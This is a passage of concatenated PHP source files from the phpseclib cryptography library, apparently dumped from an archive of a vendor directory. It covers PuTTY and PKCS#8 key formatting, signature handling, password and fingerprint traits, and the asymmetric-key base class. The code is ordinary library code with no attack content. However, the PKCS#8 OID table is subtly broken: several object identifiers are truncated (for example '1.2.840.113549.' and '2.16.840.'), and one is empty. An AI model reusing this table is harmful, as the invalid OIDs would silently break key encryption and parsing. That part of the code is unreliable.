$symiv = str_repeat("\0", $crypto->getBlockLength() >> 3); $hashkey = 'putty-private-key-file-mac-key' . $password; $hash = new Hash('sha1'); $hash->setKey(sha1($hashkey, true)); } $crypto->setKey($symkey); $crypto->setIV($symiv); $crypto->disablePadding(); $private = $crypto->encrypt($private); $mac = $hash->hash($source); } $private = Strings::base64_encode($private); $key .= 'Private-Lines: ' . ((strlen($private) + 63) >> 6) . "\r\n"; $key .= chunk_split($private, 64); $key .= 'Private-MAC: ' . Strings::bin2hex($hash->hash($source)) . "\r\n"; return $key; } /** * Wrap a public key appropriately * * This is basically the format described in RFC 4716 (https://tools.ietf.org/html/rfc4716) * * @param string $key * @param string $type * @return string */ protected static function wrapPublicKey($key, $type) { $key = pack('Na*a*', strlen($type), $type, $key); $key = "---- BEGIN SSH2 PUBLIC KEY ----\r\n" . 'Comment: "' . str_replace(['\\', '"'], ['\\\\', '\"'], self::$comment) . "\"\r\n" . chunk_split(Strings::base64_encode($key), 64) . '---- END SSH2 PUBLIC KEY ----'; return $key; } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/Common/Formats/Keys/PKCS8.php000064400000066460147600400120024205 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\Common\Formats\Keys; use phpseclib3\Common\Functions\Strings; use phpseclib3\Crypt\AES; use phpseclib3\Crypt\DES; use phpseclib3\Crypt\Random; use phpseclib3\Crypt\RC2; use phpseclib3\Crypt\RC4; use phpseclib3\Crypt\TripleDES; use phpseclib3\Exception\InsufficientSetupException; use phpseclib3\Exception\UnsupportedAlgorithmException; use phpseclib3\File\ASN1; use phpseclib3\File\ASN1\Maps; /** * PKCS#8 Formatted Key Handler * * @author Jim Wigginton */ abstract class PKCS8 extends PKCS { /** * Default encryption algorithm * * @var string */ private static $defaultEncryptionAlgorithm = 'id-PBES2'; /** * Default encryption scheme * * Only used when defaultEncryptionAlgorithm is id-PBES2 * * @var string */ private static $defaultEncryptionScheme = 'aes128-CBC-PAD'; /** * Default PRF * * Only used when defaultEncryptionAlgorithm is id-PBES2 * * @var string */ private static $defaultPRF = 'id-hmacWithSHA256'; /** * Default Iteration Count * * @var int */ private static $defaultIterationCount = 2048; /** * OIDs loaded * * @var bool */ private static $oidsLoaded = false; /** * Sets the default encryption algorithm * * @param string $algo */ public static function setEncryptionAlgorithm($algo) { self::$defaultEncryptionAlgorithm = $algo; } /** * Sets the default encryption algorithm for PBES2 * * @param string $algo */ public static function setEncryptionScheme($algo) { self::$defaultEncryptionScheme = $algo; } /** * Sets the iteration count * * @param int $count */ public static function setIterationCount($count) { self::$defaultIterationCount = $count; } /** * Sets the PRF for PBES2 * * @param string $algo */ public static function setPRF($algo) { self::$defaultPRF = $algo; } /** * Returns a SymmetricKey object based on a PBES1 $algo * * @return \phpseclib3\Crypt\Common\SymmetricKey * @param string $algo */ private static function getPBES1EncryptionObject($algo) { $algo = preg_match('#^pbeWith(?:MD2|MD5|SHA1|SHA)And(.*?)-CBC$#', $algo, $matches) ? $matches[1] : substr($algo, 13); // strlen('pbeWithSHAAnd') == 13 switch ($algo) { case 'DES': $cipher = new DES('cbc'); break; case 'RC2': $cipher = new RC2('cbc'); $cipher->setKeyLength(64); break; case '3-KeyTripleDES': $cipher = new TripleDES('cbc'); break; case '2-KeyTripleDES': $cipher = new TripleDES('cbc'); $cipher->setKeyLength(128); break; case '128BitRC2': $cipher = new RC2('cbc'); $cipher->setKeyLength(128); break; case '40BitRC2': $cipher = new RC2('cbc'); $cipher->setKeyLength(40); break; case '128BitRC4': $cipher = new RC4(); $cipher->setKeyLength(128); break; case '40BitRC4': $cipher = new RC4(); $cipher->setKeyLength(40); break; default: throw new UnsupportedAlgorithmException("$algo is not a supported algorithm"); } return $cipher; } /** * Returns a hash based on a PBES1 $algo * * @return string * @param string $algo */ private static function getPBES1Hash($algo) { if (preg_match('#^pbeWith(MD2|MD5|SHA1|SHA)And.*?-CBC$#', $algo, $matches)) { return $matches[1] == 'SHA' ? 'sha1' : $matches[1]; } return 'sha1'; } /** * Returns a KDF baesd on a PBES1 $algo * * @return string * @param string $algo */ private static function getPBES1KDF($algo) { switch ($algo) { case 'pbeWithMD2AndDES-CBC': case 'pbeWithMD2AndRC2-CBC': case 'pbeWithMD5AndDES-CBC': case 'pbeWithMD5AndRC2-CBC': case 'pbeWithSHA1AndDES-CBC': case 'pbeWithSHA1AndRC2-CBC': return 'pbkdf1'; } return 'pkcs12'; } /** * Returns a SymmetricKey object baesd on a PBES2 $algo * * @return SymmetricKey * @param string $algo */ private static function getPBES2EncryptionObject($algo) { switch ($algo) { case 'desCBC': $cipher = new DES('cbc'); break; case 'des-EDE3-CBC': $cipher = new TripleDES('cbc'); break; case 'rc2CBC': $cipher = new RC2('cbc'); // in theory this can be changed $cipher->setKeyLength(128); break; case 'rc5-CBC-PAD': throw new UnsupportedAlgorithmException('rc5-CBC-PAD is not supported for PBES2 PKCS#8 keys'); case 'aes128-CBC-PAD': case 'aes192-CBC-PAD': case 'aes256-CBC-PAD': $cipher = new AES('cbc'); $cipher->setKeyLength(substr($algo, 3, 3)); break; default: throw new UnsupportedAlgorithmException("$algo is not supported"); } return $cipher; } /** * Initialize static variables * */ private static function initialize_static_variables() { if (!isset(static::$childOIDsLoaded)) { throw new InsufficientSetupException('This class should not be called directly'); } if (!static::$childOIDsLoaded) { ASN1::loadOIDs(is_array(static::OID_NAME) ? array_combine(static::OID_NAME, static::OID_VALUE) : [static::OID_NAME => static::OID_VALUE]); static::$childOIDsLoaded = true; } if (!self::$oidsLoaded) { // from https://tools.ietf.org/html/rfc2898 ASN1::loadOIDs([ // PBES1 encryption schemes 'pbeWithMD2AndDES-CBC' => '1.2.840.113549.1.5.1', 'pbeWithMD2AndRC2-CBC' => '1.2.840.113549.1.5.4', 'pbeWithMD5AndDES-CBC' => '1.2.840.113549.1.5.3', 'pbeWithMD5AndRC2-CBC' => '1.2.840.113549.1.5.6', 'pbeWithSHA1AndDES-CBC' => '1.2.840.113549.1.5.10', 'pbeWithSHA1AndRC2-CBC' => '1.2.840.113549.1.5.11', // from PKCS#12: // https://tools.ietf.org/html/rfc7292 'pbeWithSHAAnd128BitRC4' => '1.2.840.113549.', 'pbeWithSHAAnd40BitRC4' => '1.2.840.113549.', 'pbeWithSHAAnd3-KeyTripleDES-CBC' => '1.2.840.113549.', 'pbeWithSHAAnd2-KeyTripleDES-CBC' => '1.2.840.113549.', 'pbeWithSHAAnd128BitRC2-CBC' => '1.2.840.113549.', 'pbeWithSHAAnd40BitRC2-CBC' => '1.2.840.113549.', 'id-PBKDF2' => '1.2.840.113549.1.5.12', 'id-PBES2' => '1.2.840.113549.1.5.13', 'id-PBMAC1' => '1.2.840.113549.1.5.14', // from PKCS#5 v2.1: // http://www.rsa.com/rsalabs/pkcs/files/h11302-wp-pkcs5v2-1-password-based-cryptography-standard.pdf 'id-hmacWithSHA1' => '1.2.840.113549.2.7', 'id-hmacWithSHA224' => '1.2.840.113549.2.8', 'id-hmacWithSHA256' => '1.2.840.113549.2.9', 'id-hmacWithSHA384' => '1.2.840.113549.2.10', 'id-hmacWithSHA512' => '1.2.840.113549.2.11', 'id-hmacWithSHA512-224' => '1.2.840.113549.2.12', 'id-hmacWithSHA512-256' => '1.2.840.113549.2.13', 'desCBC' => '', 'des-EDE3-CBC' => '1.2.840.113549.3.7', 'rc2CBC' => '1.2.840.113549.3.2', 'rc5-CBC-PAD' => '1.2.840.113549.3.9', 'aes128-CBC-PAD' => '2.16.840.', 'aes192-CBC-PAD' => '2.16.840.', 'aes256-CBC-PAD' => '2.16.840.' ]); self::$oidsLoaded = true; } } /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ protected static function load($key, $password = '') { if (!Strings::is_stringable($key)) { throw new \UnexpectedValueException('Key should be a string - not a ' . gettype($key)); } $isPublic = strpos($key, 'PUBLIC') !== false; $isPrivate = strpos($key, 'PRIVATE') !== false; $decoded = self::preParse($key); $meta = []; $decrypted = ASN1::asn1map($decoded[0], Maps\EncryptedPrivateKeyInfo::MAP); if (strlen($password) && is_array($decrypted)) { $algorithm = $decrypted['encryptionAlgorithm']['algorithm']; switch ($algorithm) { // PBES1 case 'pbeWithMD2AndDES-CBC': case 'pbeWithMD2AndRC2-CBC': case 'pbeWithMD5AndDES-CBC': case 'pbeWithMD5AndRC2-CBC': case 'pbeWithSHA1AndDES-CBC': case 'pbeWithSHA1AndRC2-CBC': case 'pbeWithSHAAnd3-KeyTripleDES-CBC': case 'pbeWithSHAAnd2-KeyTripleDES-CBC': case 'pbeWithSHAAnd128BitRC2-CBC': case 'pbeWithSHAAnd40BitRC2-CBC': case 'pbeWithSHAAnd128BitRC4': case 'pbeWithSHAAnd40BitRC4': $cipher = self::getPBES1EncryptionObject($algorithm); $hash = self::getPBES1Hash($algorithm); $kdf = self::getPBES1KDF($algorithm); $meta['meta']['algorithm'] = $algorithm; $temp = ASN1::decodeBER($decrypted['encryptionAlgorithm']['parameters']); if (!$temp) { throw new \RuntimeException('Unable to decode BER'); } extract(ASN1::asn1map($temp[0], Maps\PBEParameter::MAP)); $iterationCount = (int) $iterationCount->toString(); $cipher->setPassword($password, $kdf, $hash, $salt, $iterationCount); $key = $cipher->decrypt($decrypted['encryptedData']); $decoded = ASN1::decodeBER($key); if (!$decoded) { throw new \RuntimeException('Unable to decode BER 2'); } break; case 'id-PBES2': $meta['meta']['algorithm'] = $algorithm; $temp = ASN1::decodeBER($decrypted['encryptionAlgorithm']['parameters']); if (!$temp) { throw new \RuntimeException('Unable to decode BER'); } $temp = ASN1::asn1map($temp[0], Maps\PBES2params::MAP); extract($temp); $cipher = self::getPBES2EncryptionObject($encryptionScheme['algorithm']); $meta['meta']['cipher'] = $encryptionScheme['algorithm']; $temp = ASN1::decodeBER($decrypted['encryptionAlgorithm']['parameters']); if (!$temp) { throw new \RuntimeException('Unable to decode BER'); } $temp = ASN1::asn1map($temp[0], Maps\PBES2params::MAP); extract($temp); if (!$cipher instanceof RC2) { $cipher->setIV($encryptionScheme['parameters']['octetString']); } else { $temp = ASN1::decodeBER($encryptionScheme['parameters']); if (!$temp) { throw new \RuntimeException('Unable to decode BER'); } extract(ASN1::asn1map($temp[0], Maps\RC2CBCParameter::MAP)); $effectiveKeyLength = (int) $rc2ParametersVersion->toString(); switch ($effectiveKeyLength) { case 160: $effectiveKeyLength = 40; break; case 120: $effectiveKeyLength = 64; break; case 58: $effectiveKeyLength = 128; break; //default: // should be >= 256 } $cipher->setIV($iv); $cipher->setKeyLength($effectiveKeyLength); } $meta['meta']['keyDerivationFunc'] = $keyDerivationFunc['algorithm']; switch ($keyDerivationFunc['algorithm']) { case 'id-PBKDF2': $temp = ASN1::decodeBER($keyDerivationFunc['parameters']); if (!$temp) { throw new \RuntimeException('Unable to decode BER'); } $prf = ['algorithm' => 'id-hmacWithSHA1']; $params = ASN1::asn1map($temp[0], Maps\PBKDF2params::MAP); extract($params); $meta['meta']['prf'] = $prf['algorithm']; $hash = str_replace('-', '/', substr($prf['algorithm'], 11)); $params = [ $password, 'pbkdf2', $hash, $salt, (int) $iterationCount->toString() ]; if (isset($keyLength)) { $params[] = (int) $keyLength->toString(); } $cipher->setPassword(...$params); $key = $cipher->decrypt($decrypted['encryptedData']); $decoded = ASN1::decodeBER($key); if (!$decoded) { throw new \RuntimeException('Unable to decode BER 3'); } break; default: throw new UnsupportedAlgorithmException('Only PBKDF2 is supported for PBES2 PKCS#8 keys'); } break; case 'id-PBMAC1': //$temp = ASN1::decodeBER($decrypted['encryptionAlgorithm']['parameters']); //$value = ASN1::asn1map($temp[0], Maps\PBMAC1params::MAP); // since i can't find any implementation that does PBMAC1 it is unsupported throw new UnsupportedAlgorithmException('Only PBES1 and PBES2 PKCS#8 keys are supported.'); // at this point we'll assume that the key conforms to PublicKeyInfo } } $private = ASN1::asn1map($decoded[0], Maps\OneAsymmetricKey::MAP); if (is_array($private)) { if ($isPublic) { throw new \UnexpectedValueException('Human readable string claims public key but DER encoded string claims private key'); } if (isset($private['privateKeyAlgorithm']['parameters']) && !$private['privateKeyAlgorithm']['parameters'] instanceof ASN1\Element && isset($decoded[0]['content'][1]['content'][1])) { $temp = $decoded[0]['content'][1]['content'][1]; $private['privateKeyAlgorithm']['parameters'] = new ASN1\Element(substr($key, $temp['start'], $temp['length'])); } if (is_array(static::OID_NAME)) { if (!in_array($private['privateKeyAlgorithm']['algorithm'], static::OID_NAME)) { throw new UnsupportedAlgorithmException($private['privateKeyAlgorithm']['algorithm'] . ' is not a supported key type'); } } else { if ($private['privateKeyAlgorithm']['algorithm'] != static::OID_NAME) { throw new UnsupportedAlgorithmException('Only ' . static::OID_NAME . ' keys are supported; this is a ' . $private['privateKeyAlgorithm']['algorithm'] . ' key'); } } if (isset($private['publicKey'])) { if ($private['publicKey'][0] != "\0") { throw new \UnexpectedValueException('The first byte of the public key should be null - not ' . bin2hex($private['publicKey'][0])); } $private['publicKey'] = substr($private['publicKey'], 1); } return $private + $meta; } // EncryptedPrivateKeyInfo and PublicKeyInfo have largely identical "signatures". the only difference // is that the former has an octet string and the later has a bit string. the first byte of a bit // string represents the number of bits in the last byte that are to be ignored but, currently, // bit strings wanting a non-zero amount of bits trimmed are not supported $public = ASN1::asn1map($decoded[0], Maps\PublicKeyInfo::MAP); if (is_array($public)) { if ($isPrivate) { throw new \UnexpectedValueException('Human readable string claims private key but DER encoded string claims public key'); } if ($public['publicKey'][0] != "\0") { throw new \UnexpectedValueException('The first byte of the public key should be null - not ' . bin2hex($public['publicKey'][0])); } if (is_array(static::OID_NAME)) { if (!in_array($public['publicKeyAlgorithm']['algorithm'], static::OID_NAME)) { throw new UnsupportedAlgorithmException($public['publicKeyAlgorithm']['algorithm'] . ' is not a supported key type'); } } else { if ($public['publicKeyAlgorithm']['algorithm'] != static::OID_NAME) { throw new UnsupportedAlgorithmException('Only ' . static::OID_NAME . ' keys are supported; this is a ' . $public['publicKeyAlgorithm']['algorithm'] . ' key'); } } if (isset($public['publicKeyAlgorithm']['parameters']) && !$public['publicKeyAlgorithm']['parameters'] instanceof ASN1\Element && isset($decoded[0]['content'][0]['content'][1])) { $temp = $decoded[0]['content'][0]['content'][1]; $public['publicKeyAlgorithm']['parameters'] = new ASN1\Element(substr($key, $temp['start'], $temp['length'])); } $public['publicKey'] = substr($public['publicKey'], 1); return $public; } throw new \RuntimeException('Unable to parse using either OneAsymmetricKey or PublicKeyInfo ASN1 maps'); } /** * Wrap a private key appropriately * * @param string $key * @param string $attr * @param mixed $params * @param string $password * @param string $oid optional * @param string $publicKey optional * @param array $options optional * @return string */ protected static function wrapPrivateKey($key, $attr, $params, $password, $oid = null, $publicKey = '', array $options = []) { self::initialize_static_variables(); $key = [ 'version' => 'v1', 'privateKeyAlgorithm' => [ 'algorithm' => is_string(static::OID_NAME) ? static::OID_NAME : $oid ], 'privateKey' => $key ]; if ($oid != 'id-Ed25519' && $oid != 'id-Ed448') { $key['privateKeyAlgorithm']['parameters'] = $params; } if (!empty($attr)) { $key['attributes'] = $attr; } if (!empty($publicKey)) { $key['version'] = 'v2'; $key['publicKey'] = $publicKey; } $key = ASN1::encodeDER($key, Maps\OneAsymmetricKey::MAP); if (!empty($password) && is_string($password)) { $salt = Random::string(8); $iterationCount = isset($options['iterationCount']) ? $options['iterationCount'] : self::$defaultIterationCount; $encryptionAlgorithm = isset($options['encryptionAlgorithm']) ? $options['encryptionAlgorithm'] : self::$defaultEncryptionAlgorithm; $encryptionScheme = isset($options['encryptionScheme']) ? $options['encryptionScheme'] : self::$defaultEncryptionScheme; $prf = isset($options['PRF']) ? $options['PRF'] : self::$defaultPRF; if ($encryptionAlgorithm == 'id-PBES2') { $crypto = self::getPBES2EncryptionObject($encryptionScheme); $hash = str_replace('-', '/', substr($prf, 11)); $kdf = 'pbkdf2'; $iv = Random::string($crypto->getBlockLength() >> 3); $PBKDF2params = [ 'salt' => $salt, 'iterationCount' => $iterationCount, 'prf' => ['algorithm' => $prf, 'parameters' => null] ]; $PBKDF2params = ASN1::encodeDER($PBKDF2params, Maps\PBKDF2params::MAP); if (!$crypto instanceof RC2) { $params = ['octetString' => $iv]; } else { $params = [ 'rc2ParametersVersion' => 58, 'iv' => $iv ]; $params = ASN1::encodeDER($params, Maps\RC2CBCParameter::MAP); $params = new ASN1\Element($params); } $params = [ 'keyDerivationFunc' => [ 'algorithm' => 'id-PBKDF2', 'parameters' => new ASN1\Element($PBKDF2params) ], 'encryptionScheme' => [ 'algorithm' => $encryptionScheme, 'parameters' => $params ] ]; $params = ASN1::encodeDER($params, Maps\PBES2params::MAP); $crypto->setIV($iv); } else { $crypto = self::getPBES1EncryptionObject($encryptionAlgorithm); $hash = self::getPBES1Hash($encryptionAlgorithm); $kdf = self::getPBES1KDF($encryptionAlgorithm); $params = [ 'salt' => $salt, 'iterationCount' => $iterationCount ]; $params = ASN1::encodeDER($params, Maps\PBEParameter::MAP); } $crypto->setPassword($password, $kdf, $hash, $salt, $iterationCount); $key = $crypto->encrypt($key); $key = [ 'encryptionAlgorithm' => [ 'algorithm' => $encryptionAlgorithm, 'parameters' => new ASN1\Element($params) ], 'encryptedData' => $key ]; $key = ASN1::encodeDER($key, Maps\EncryptedPrivateKeyInfo::MAP); return "-----BEGIN ENCRYPTED PRIVATE KEY-----\r\n" . chunk_split(Strings::base64_encode($key), 64) . "-----END ENCRYPTED PRIVATE KEY-----"; } return "-----BEGIN PRIVATE KEY-----\r\n" . chunk_split(Strings::base64_encode($key), 64) . "-----END PRIVATE KEY-----"; } /** * Wrap a public key appropriately * * @param string $key * @param mixed $params * @param string $oid * @return string */ protected static function wrapPublicKey($key, $params, $oid = null) { self::initialize_static_variables(); $key = [ 'publicKeyAlgorithm' => [ 'algorithm' => is_string(static::OID_NAME) ? static::OID_NAME : $oid ], 'publicKey' => "\0" . $key ]; if ($oid != 'id-Ed25519' && $oid != 'id-Ed448') { $key['publicKeyAlgorithm']['parameters'] = $params; } $key = ASN1::encodeDER($key, Maps\PublicKeyInfo::MAP); return "-----BEGIN PUBLIC KEY-----\r\n" . chunk_split(Strings::base64_encode($key), 64) . "-----END PUBLIC KEY-----"; } /** * Perform some preliminary parsing of the key * * @param string $key * @return array */ private static function preParse(&$key) { self::initialize_static_variables(); if (self::$format != self::MODE_DER) { $decoded = ASN1::extractBER($key); if ($decoded !== false) { $key = $decoded; } elseif (self::$format == self::MODE_PEM) { throw new \UnexpectedValueException('Expected base64-encoded PEM format but was unable to decode base64 text'); } } $decoded = ASN1::decodeBER($key); if (!$decoded) { throw new \RuntimeException('Unable to decode BER'); } return $decoded; } /** * Returns the encryption parameters used by the key * * @param string $key * @return array */ public static function extractEncryptionAlgorithm($key) { if (!Strings::is_stringable($key)) { throw new \UnexpectedValueException('Key should be a string - not a ' . gettype($key)); } $decoded = self::preParse($key); $r = ASN1::asn1map($decoded[0], ASN1\Maps\EncryptedPrivateKeyInfo::MAP); if (!is_array($r)) { throw new \RuntimeException('Unable to parse using EncryptedPrivateKeyInfo map'); } if ($r['encryptionAlgorithm']['algorithm'] == 'id-PBES2') { $decoded = ASN1::decodeBER($r['encryptionAlgorithm']['parameters']->element); if (!$decoded) { throw new \RuntimeException('Unable to decode BER'); } $r['encryptionAlgorithm']['parameters'] = ASN1::asn1map($decoded[0], ASN1\Maps\PBES2params::MAP); $kdf = &$r['encryptionAlgorithm']['parameters']['keyDerivationFunc']; switch ($kdf['algorithm']) { case 'id-PBKDF2': $decoded = ASN1::decodeBER($kdf['parameters']->element); if (!$decoded) { throw new \RuntimeException('Unable to decode BER'); } $kdf['parameters'] = ASN1::asn1map($decoded[0], Maps\PBKDF2params::MAP); } } return $r['encryptionAlgorithm']; } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/Common/Formats/Signature/Raw.php000064400000002413147600400120025120 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\Common\Formats\Signature; use phpseclib3\Math\BigInteger; /** * Raw Signature Handler * * @author Jim Wigginton */ abstract class Raw { /** * Loads a signature * * @param array $sig * @return array|bool */ public static function load($sig) { switch (true) { case !is_array($sig): case !isset($sig['r']) || !isset($sig['s']): case !$sig['r'] instanceof BigInteger: case !$sig['s'] instanceof BigInteger: return false; } return [ 'r' => $sig['r'], 's' => $sig['s'] ]; } /** * Returns a signature in the appropriate format * * @param \phpseclib3\Math\BigInteger $r * @param \phpseclib3\Math\BigInteger $s * @return string */ public static function save(BigInteger $r, BigInteger $s) { return compact('r', 's'); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/Common/Traits/PasswordProtected.php000064400000002052147600400120025734 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\Common\Traits; /** * Password Protected Trait for Private Keys * * @author Jim Wigginton */ trait PasswordProtected { /** * Password * * @var string|bool */ private $password = false; /** * Sets the password * * Private keys can be encrypted with a password. To unset the password, pass in the empty string or false. * Or rather, pass in $password such that empty($password) && !is_string($password) is true. * * @see self::createKey() * @see self::load() * @param string|bool $password */ public function withPassword($password = false) { $new = clone $this; $new->password = $password; return $new; } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/Common/Traits/Fingerprint.php000064400000003256147600400120024556 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\Common\Traits; use phpseclib3\Crypt\Hash; /** * Fingerprint Trait for Private Keys * * @author Jim Wigginton */ trait Fingerprint { /** * Returns the public key's fingerprint * * The public key's fingerprint is returned, which is equivalent to running `ssh-keygen -lf rsa.pub`. If there is * no public key currently loaded, false is returned. * Example output (md5): "c1:b1:30:29:d7:b8:de:6c:97:77:10:d7:46:41:63:87" (as specified by RFC 4716) * * @param string $algorithm The hashing algorithm to be used. Valid options are 'md5' and 'sha256'. False is returned * for invalid values. * @return mixed */ public function getFingerprint($algorithm = 'md5') { $type = self::validatePlugin('Keys', 'OpenSSH', 'savePublicKey'); if ($type === false) { return false; } $key = $this->toString('OpenSSH', ['binary' => true]); if ($key === false) { return false; } switch ($algorithm) { case 'sha256': $hash = new Hash('sha256'); $base = base64_encode($hash->hash($key)); return substr($base, 0, strlen($base) - 1); case 'md5': return substr(chunk_split(md5($key), 2, ':'), 0, -1); default: return false; } } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/Common/PrivateKey.php000064400000001270147600400120023076 0ustar00 * @copyright 2009 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\Common; /** * PrivateKey interface * * @author Jim Wigginton */ interface PrivateKey { public function sign($message); //public function decrypt($ciphertext); public function getPublicKey(); public function toString($type, array $options = []); /** * @param string|false $password * @return mixed */ public function withPassword($password = false); } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/Common/AsymmetricKey.php000064400000035716147600400120023615 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\Common; use phpseclib3\Crypt\DSA; use phpseclib3\Crypt\Hash; use phpseclib3\Crypt\RSA; use phpseclib3\Exception\NoKeyLoadedException; use phpseclib3\Exception\UnsupportedFormatException; use phpseclib3\Math\BigInteger; /** * Base Class for all asymmetric cipher classes * * @author Jim Wigginton */ abstract class AsymmetricKey { /** * Precomputed Zero * * @var \phpseclib3\Math\BigInteger */ protected static $zero; /** * Precomputed One * * @var \phpseclib3\Math\BigInteger */ protected static $one; /** * Format of the loaded key * * @var string */ protected $format; /** * Hash function * * @var \phpseclib3\Crypt\Hash */ protected $hash; /** * HMAC function * * @var \phpseclib3\Crypt\Hash */ private $hmac; /** * Supported plugins (lower case) * * @see self::initialize_static_variables() * @var array */ private static $plugins = []; /** * Invisible plugins * * @see self::initialize_static_variables() * @var array */ private static $invisiblePlugins = []; /** * Available Engines * * @var boolean[] */ protected static $engines = []; /** * Key Comment * * @var null|string */ private $comment; /** * @param string $type * @return array|string */ abstract public function toString($type, array $options = []); /** * The constructor */ protected function __construct() { self::initialize_static_variables(); $this->hash = new Hash('sha256'); $this->hmac = new Hash('sha256'); } /** * Initialize static variables */ protected static function initialize_static_variables() { if (!isset(self::$zero)) { self::$zero = new BigInteger(0); self::$one = new BigInteger(1); } self::loadPlugins('Keys'); if (static::ALGORITHM != 'RSA' && static::ALGORITHM != 'DH') { self::loadPlugins('Signature'); } } /** * Load the key * * @param string $key * @param string $password optional * @return \phpseclib3\Crypt\Common\PublicKey|\phpseclib3\Crypt\Common\PrivateKey */ public static function load($key, $password = false) { self::initialize_static_variables(); $class = new \ReflectionClass(static::class); if ($class->isFinal()) { throw new \RuntimeException('load() should not be called from final classes (' . static::class . ')'); } $components = false; foreach (self::$plugins[static::ALGORITHM]['Keys'] as $format) { if (isset(self::$invisiblePlugins[static::ALGORITHM]) && in_array($format, self::$invisiblePlugins[static::ALGORITHM])) { continue; } try { $components = $format::load($key, $password); } catch (\Exception $e) { $components = false; } if ($components !== false) { break; } } if ($components === false) { throw new NoKeyLoadedException('Unable to read key'); } $components['format'] = $format; $components['secret'] = isset($components['secret']) ? $components['secret'] : ''; $comment = isset($components['comment']) ? $components['comment'] : null; $new = static::onLoad($components); $new->format = $format; $new->comment = $comment; return $new instanceof PrivateKey ? $new->withPassword($password) : $new; } /** * Loads a private key * * @return PrivateKey * @param string|array $key * @param string $password optional */ public static function loadPrivateKey($key, $password = '') { $key = self::load($key, $password); if (!$key instanceof PrivateKey) { throw new NoKeyLoadedException('The key that was loaded was not a private key'); } return $key; } /** * Loads a public key * * @return PublicKey * @param string|array $key */ public static function loadPublicKey($key) { $key = self::load($key); if (!$key instanceof PublicKey) { throw new NoKeyLoadedException('The key that was loaded was not a public key'); } return $key; } /** * Loads parameters * * @return AsymmetricKey * @param string|array $key */ public static function loadParameters($key) { $key = self::load($key); if (!$key instanceof PrivateKey && !$key instanceof PublicKey) { throw new NoKeyLoadedException('The key that was loaded was not a parameter'); } return $key; } /** * Load the key, assuming a specific format * * @param string $type * @param string $key * @param string $password optional * @return static */ public static function loadFormat($type, $key, $password = false) { self::initialize_static_variables(); $components = false; $format = strtolower($type); if (isset(self::$plugins[static::ALGORITHM]['Keys'][$format])) { $format = self::$plugins[static::ALGORITHM]['Keys'][$format]; $components = $format::load($key, $password); } if ($components === false) { throw new NoKeyLoadedException('Unable to read key'); } $components['format'] = $format; $components['secret'] = isset($components['secret']) ? $components['secret'] : ''; $new = static::onLoad($components); $new->format = $format; return $new instanceof PrivateKey ? $new->withPassword($password) : $new; } /** * Loads a private key * * @return PrivateKey * @param string $type * @param string $key * @param string $password optional */ public static function loadPrivateKeyFormat($type, $key, $password = false) { $key = self::loadFormat($type, $key, $password); if (!$key instanceof PrivateKey) { throw new NoKeyLoadedException('The key that was loaded was not a private key'); } return $key; } /** * Loads a public key * * @return PublicKey * @param string $type * @param string $key */ public static function loadPublicKeyFormat($type, $key) { $key = self::loadFormat($type, $key); if (!$key instanceof PublicKey) { throw new NoKeyLoadedException('The key that was loaded was not a public key'); } return $key; } /** * Loads parameters * * @return AsymmetricKey * @param string $type * @param string|array $key */ public static function loadParametersFormat($type, $key) { $key = self::loadFormat($type, $key); if (!$key instanceof PrivateKey && !$key instanceof PublicKey) { throw new NoKeyLoadedException('The key that was loaded was not a parameter'); } return $key; } /** * Validate Plugin * * @param string $format * @param string $type * @param string $method optional * @return mixed */ protected static function validatePlugin($format, $type, $method = null) { $type = strtolower($type); if (!isset(self::$plugins[static::ALGORITHM][$format][$type])) { throw new UnsupportedFormatException("$type is not a supported format"); } $type = self::$plugins[static::ALGORITHM][$format][$type]; if (isset($method) && !method_exists($type, $method)) { throw new UnsupportedFormatException("$type does not implement $method"); } return $type; } /** * Load Plugins * * @param string $format */ private static function loadPlugins($format) { if (!isset(self::$plugins[static::ALGORITHM][$format])) { self::$plugins[static::ALGORITHM][$format] = []; foreach (new \DirectoryIterator(__DIR__ . '/../' . static::ALGORITHM . '/Formats/' . $format . '/') as $file) { if ($file->getExtension() != 'php') { continue; } $name = $file->getBasename('.php'); if ($name[0] == '.') { continue; } $type = 'phpseclib3\Crypt\\' . static::ALGORITHM . '\\Formats\\' . $format . '\\' . $name; $reflect = new \ReflectionClass($type); if ($reflect->isTrait()) { continue; } self::$plugins[static::ALGORITHM][$format][strtolower($name)] = $type; if ($reflect->hasConstant('IS_INVISIBLE')) { self::$invisiblePlugins[static::ALGORITHM][] = $type; } } } } /** * Returns a list of supported formats. * * @return array */ public static function getSupportedKeyFormats() { self::initialize_static_variables(); return self::$plugins[static::ALGORITHM]['Keys']; } /** * Add a fileformat plugin * * The plugin needs to either already be loaded or be auto-loadable. * Loading a plugin whose shortname overwrite an existing shortname will overwrite the old plugin. * * @see self::load() * @param string $fullname * @return bool */ public static function addFileFormat($fullname) { self::initialize_static_variables(); if (class_exists($fullname)) { $meta = new \ReflectionClass($fullname); $shortname = $meta->getShortName(); self::$plugins[static::ALGORITHM]['Keys'][strtolower($shortname)] = $fullname; if ($meta->hasConstant('IS_INVISIBLE')) { self::$invisiblePlugins[static::ALGORITHM][] = strtolower($shortname); } } } /** * Returns the format of the loaded key. * * If the key that was loaded wasn't in a valid or if the key was auto-generated * with RSA::createKey() then this will throw an exception. * * @see self::load() * @return mixed */ public function getLoadedFormat() { if 